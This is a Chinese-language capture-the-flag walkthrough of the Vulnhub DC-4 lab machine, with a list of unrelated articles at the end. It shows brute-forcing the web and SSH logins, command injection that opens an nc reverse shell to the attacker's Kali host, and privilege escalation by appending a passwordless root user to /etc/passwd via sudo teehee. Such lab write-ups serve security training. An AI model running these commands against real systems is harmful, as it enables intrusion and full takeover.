Vulnhub靶场 | DC系列 - DC4

2024-08-31 08:52
文章标签 系列 靶场 dc vulnhub dc4

本文主要是介绍Vulnhub靶场 | DC系列 - DC4,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • DC-4
  • 环境搭建
  • 渗透测试

DC-4

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.150。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.150

查看下端口对应的服务版本。

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80  192.168.10.150

尝试搜索OpenSSH和nginx相关的exp,但是貌似没有适合的~

扫一下网站目录,也没有特别的地方~

没办法了,对网站用户名密码爆破一下吧

爆破出来的用户名为admin,密码为happy,成功登录(也许这里真的是需要爆破来突破)。

登录成功

点击“Command”看一看~

发现,里面有三个功能,可以执行3条系统命令:

  • ls -l
  • du -h
  • df -h

抓个包,看看能不能修改执行的系统命令。

这里确实可以修改~

换成其他命令执行看看~可以正常返回结果~

开始写马~使用nc建立反弹连接

nc+192.168.10.146+4444+-e+/bin/bash

成功建立反弹连接

使用python获得下交互shell

python -c "import pty; pty.spawn('/bin/bash');"

接下来提权。

收集一下版本信息~

www-data@dc-4:/usr/share/nginx/html$ uname -a
www-data@dc-4:/usr/share/nginx/html$ cat /proc/version
...

搜了下相关内核漏洞提权脚本,没有~

搜一搜设置了SUID的文件:

www-data@dc-4:/usr/share/nginx/html$ find / -perm -u=s 2>/dev/null

貌似没有可以提权的命令.

查看下有哪些用户:

发现有三个用户:charles、jim、sam

查看了下,charles、sam的家目录下没有什么东西。

jim家目录下有两个文件,一个目录。

mbox没有权限访问,backups中有个旧密码备份?

/home/jim/backups/old-passwords.bak

拿这个密码爆破一下吧~

┌──(root💀kali)-[~/桌面]
└─# hydra -l jim -P ./ps.txt 192.168.10.150 ssh

结果如下

jim的密码是jibril04。成功登录~

看一下jim的sudo授权,并没有可利用的~

看一下mbox,有权限查看,是一封邮件。

有邮件,说明该系统时候邮件系统的,查看一下邮件

查看邮件jim,是charles发来的一封邮件,告诉了jim密码:^xHhA&hvim0y

使用该密码切换到charles

先看一下有没有sudo授权

发现,可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户。

charles@dc-4:~$ echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

切换到hack用户。

成功拿到flag。

🔗Reference:DC-4

  • https://blog.csdn.net/qq_15131581/article/details/127663366

这篇关于Vulnhub靶场 | DC系列 - DC4的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1123440

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

GPT系列之:GPT-1,GPT-2,GPT-3详细解读

一、GPT1 论文:Improving Language Understanding by Generative Pre-Training 链接:https://cdn.openai.com/research-covers/languageunsupervised/language_understanding_paper.pdf 启发点:生成loss和微调loss同时作用,让下游任务来适应预训

Java基础回顾系列-第七天-高级编程之IO

Java基础回顾系列-第七天-高级编程之IO 文件操作字节流与字符流OutputStream字节输出流FileOutputStream InputStream字节输入流FileInputStream Writer字符输出流FileWriter Reader字符输入流字节流与字符流的区别转换流InputStreamReaderOutputStreamWriter 文件复制 字符编码内存操作流(

Java基础回顾系列-第五天-高级编程之API类库

Java基础回顾系列-第五天-高级编程之API类库 Java基础类库StringBufferStringBuilderStringCharSequence接口AutoCloseable接口RuntimeSystemCleaner对象克隆 数字操作类Math数学计算类Random随机数生成类BigInteger/BigDecimal大数字操作类 日期操作类DateSimpleDateForma

Java基础回顾系列-第三天-Lambda表达式

Java基础回顾系列-第三天-Lambda表达式 Lambda表达式方法引用引用静态方法引用实例化对象的方法引用特定类型的方法引用构造方法 内建函数式接口Function基础接口DoubleToIntFunction 类型转换接口Consumer消费型函数式接口Supplier供给型函数式接口Predicate断言型函数式接口 Stream API 该篇博文需重点了解:内建函数式

Java基础回顾系列-第二天-面向对象编程

面向对象编程 Java类核心开发结构面向对象封装继承多态 抽象类abstract接口interface抽象类与接口的区别深入分析类与对象内存分析 继承extends重写(Override)与重载(Overload)重写(Override)重载(Overload)重写与重载之间的区别总结 this关键字static关键字static变量static方法static代码块 代码块String类特